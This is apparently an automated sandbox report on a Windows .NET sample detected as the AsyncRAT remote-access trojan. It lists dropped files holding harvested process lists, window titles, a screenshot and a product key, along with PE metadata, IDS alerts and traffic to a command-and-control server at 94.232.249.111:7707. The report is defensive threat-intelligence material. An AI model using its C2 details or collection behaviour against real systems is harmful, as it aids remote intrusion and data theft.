                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.5191090305155277
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                  MD5:3A37312509712D4E12D27240137FF377
                                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):504
                                                                  Entropy (8bit):3.514398793376306
                                                                  Encrypted:false
                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):17574
                                                                  Entropy (8bit):5.698099289332728
                                                                  Encrypted:false
                                                                  SSDEEP:96:HlcQuJQuwQX7QCpzQu2Q8C23ioQA1QuvkQu4QpqcBZQpUETRQq4QCYqQu6Qubfwl:HMqnUEnbYim4Jzvwq4WKc16uj2
                                                                  MD5:50A50A0E30E2272F900624CD6319FCB3
                                                                  SHA1:11B9ECC7F0E5C990521D83CA8E8FD94499C53C40
                                                                  SHA-256:077A859AC24B7A510364B376474F843F82E67D6F291E92869AD0CE2B3109CB97
                                                                  SHA-512:D2924877C0A44E435F15A4827113C37F6008E83897FD6E9260317ADB8A1C476D50B3BC3B024F0B48ED036F940F94E302A65E5C01E6FB85C08B5F36D0633CC50B
                                                                  Malicious:false
                                                                  Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: dllhost..PID: 3428..EXE: C:\Windows\system32\DllHost.exe..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: C:\Windows\
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29
                                                                  Entropy (8bit):4.142295219190902
                                                                  Encrypted:false
                                                                  SSDEEP:3:O2eRntm:OrRnI
                                                                  MD5:69F1EB7DBB946D78F0D2AE0B7228257C
                                                                  SHA1:E1229CD69E21F921D135B7575A0F8E1EC5CAB0F5
                                                                  SHA-256:3240C86D3379358DB1AC976D64A510BA746F273BBCC6A16C4C88E4D0002E3F9D
                                                                  SHA-512:DAD1B6A1B744869CB2B77FEFC202E9AAA724BD3B9254C827C7F2C006A906DC3671038B1C189B965F7017E76003AECE7ADAE4DEFB7E3D6E6860258A120666E5D4
                                                                  Malicious:false
                                                                  Preview:PJN2M-GWXQB-JGFCC-DT97H-B64C4
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):84
                                                                  Entropy (8bit):4.6630509827051725
                                                                  Encrypted:false
                                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                  Malicious:false
                                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):13461
                                                                  Entropy (8bit):5.661557387078866
                                                                  Encrypted:false
                                                                  SSDEEP:96:okQuRQuIQuTQu7QuOQuwQuNQuHkQuQQR5HRQu5QugQuSQuyQu1KQuoQ4yzqToQuA:9mm6Nr
                                                                  MD5:2E19D87AA7C2834A564D143E94FFB72B
                                                                  SHA1:05B32AB94A1BE83DD5130EEC1D3425F876F99F62
                                                                  SHA-256:E26FE6099161CBCB45FFC873C1F972616A5176AE45BCBC5FAF8EC2E50668781E
                                                                  SHA-512:9340F24E7AB865AD93DA0E4686504B3E1DB5DB488AD1E347519901725D2A7B6A5E93E9025BA17B4FDD2ED03E026AF237DEB81CDE0307E33856E13B4234FB6684
                                                                  Malicious:false
                                                                  Preview:NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6864..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6432..EXE: C:\Prog
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                  Category:dropped
                                                                  Size (bytes):85767
                                                                  Entropy (8bit):7.853997815147752
                                                                  Encrypted:false
                                                                  SSDEEP:1536:CL3NNYJeIpZc0t5VhYy8+XDtRCec2bDv5v777UrYXnzwmDZqxP4MUnd:mNNYJvlt5VhYyRGec2pD77Usjw5Zgd
                                                                  MD5:656D152B7BE147FE1B650753016338DE
                                                                  SHA1:D00070618EB319F76C9B4D88A49BEE27485155E1
                                                                  SHA-256:1A4ED9C4EE79FE2D702B4D94BC38C8A4579F14A6DB396BA9FD60280D3166F8DA
                                                                  SHA-512:2745F300B6BEAC678EB2A56E4036DC5DD92963294C775A2827719588911B516CFD1E1FA6574F0B0BEFC1F4FD8C33179AE82C66D080CC75B2DB0BFEAFA7DB062C
                                                                  Malicious:false
                                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):3
                                                                  Entropy (8bit):1.584962500721156
                                                                  Encrypted:false
                                                                  SSDEEP:3:jX:r
                                                                  MD5:C22ABFA379F38B5B0411BC11FA9BF92F
                                                                  SHA1:5A14EC71168CE0B15C0E9CECE3865E308E28E32B
                                                                  SHA-256:3658D7FA3C43456F3C9C87DB0490E872039516E6375336254560167CC3DB2EA2
                                                                  SHA-512:8CF2BC30BF48B1BC3BEFDB298A389C99BC806E801A12909413583EFBD4348D6227421F43E9A2EA8508EA05B4E0FC23DAE4E2E26A54887F7080876D4CFA42DF95
                                                                  Malicious:false
                                                                  Preview:972
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:modified
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Preview:0
                                                                  Process:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):48640
                                                                  Entropy (8bit):5.560726940578406
                                                                  Encrypted:false
                                                                  SSDEEP:768:IuyxNTAoZjRWUJd9bmo2qL2TJ4+3Qk8sna9lzPIaj9vtqb5HTKsvWy0oKCnX5Eev:IuyxNTAGL2Mk839lcaj9vIbJWsZoWFnt
                                                                  MD5:6D13D147A209E3BE044035F0C03B7BDE
                                                                  SHA1:1EB5FB487EA7742FF1766CA5BF1B7191CFCF6283
                                                                  SHA-256:9C457B1CD061AE951FBED7841149B247E085BEFA6E2C5170058CE35CDEBCE548
                                                                  SHA-512:A159D09265FA833AFDDCE5FE7FAB6D4BE0FC37FD4C2E0D1A15851427764AD3C068249BA28D000A076209D017CB65E4320752AC7A3A0314239D836F1E15AE39A9
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                  Joe Sandbox View:
                                                                   • Filename: w5APKwp5DD.exe, Detection: malicious
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................~.... ........@.. ....................... ............@.................................(...S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H........Y..4v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vrv%.p~....(o....#...*.s...
                                                                  Process:C:\Windows\SysWOW64\timeout.exe
                                                                  File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.41440934524794
                                                                  Encrypted:false
                                                                  SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                  MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                  SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                  SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                  SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                  Malicious:false
                                                                  Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.560726940578406
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:zrrHgsDzgS.exe
                                                                  File size:48'640 bytes
                                                                  MD5:6d13d147a209e3be044035f0c03b7bde
                                                                  SHA1:1eb5fb487ea7742ff1766ca5bf1b7191cfcf6283
                                                                  SHA256:9c457b1cd061ae951fbed7841149b247e085befa6e2c5170058ce35cdebce548
                                                                  SHA512:a159d09265fa833afddce5fe7fab6d4be0fc37fd4c2e0d1a15851427764ad3c068249ba28d000a076209d017cb65e4320752ac7a3a0314239d836f1e15ae39a9
                                                                  SSDEEP:768:IuyxNTAoZjRWUJd9bmo2qL2TJ4+3Qk8sna9lzPIaj9vtqb5HTKsvWy0oKCnX5Eev:IuyxNTAGL2Mk839lcaj9vIbJWsZoWFnt
                                                                  TLSH:BC233D003BE98227F27E4F78ADF22245857AF6673602D64D2CC4519B5B13FC296426FE
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-e............................~.... ........@.. ....................... ............@................................
                                                                  Icon Hash:90cececece8e8eb0
                                                                  Entrypoint:0x40d07e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x652DADE5 [Mon Oct 16 21:40:53 2023 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                   Name                                  Virtual Address  Virtual Size  Is in Section
                                                                   IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_IMPORT          0xd028           0x53          .text
                                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe000           0x7ff         .rsrc
                                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC       0x10000          0xc           .reloc
                                                                   IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                   IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb084 | 0xb200 | 445296c6266560c64480205d2ff55c02 | False | 0.5416959269662921 | data | 5.618380092634787 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe000 | 0x7ff | 0x800 | 0f68ce4dd77ed0bb9c1e6b31f6995d94 | False | 0.41748046875 | data | 4.88506844918463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0xc | 0x200 | 4cabfef58a4e8716ddd98e1c6e729d0d | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe0a0 | 0x2cc | data | | | 0.43575418994413406
RT_MANIFEST | 0xe36c | 0x493 | exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.43381725021349277
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/28/24-11:19:22.223998 | TCP | 2030673 | ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
06/28/24-11:19:22.223998 | TCP | 2035595 | ET TROJAN Generic AsyncRAT Style SSL Cert | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Jun 28, 2024 11:19:24.694729090 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694740057 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694746971 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694772959 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694850922 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.694958925 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695003986 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695014954 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695046902 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695152998 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695163965 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695179939 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695190907 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695203066 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695231915 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695333004 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695343971 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695379972 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695503950 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695517063 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695527077 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695538044 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695549965 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695555925 CEST497397707192.168.2.494.232.249.111
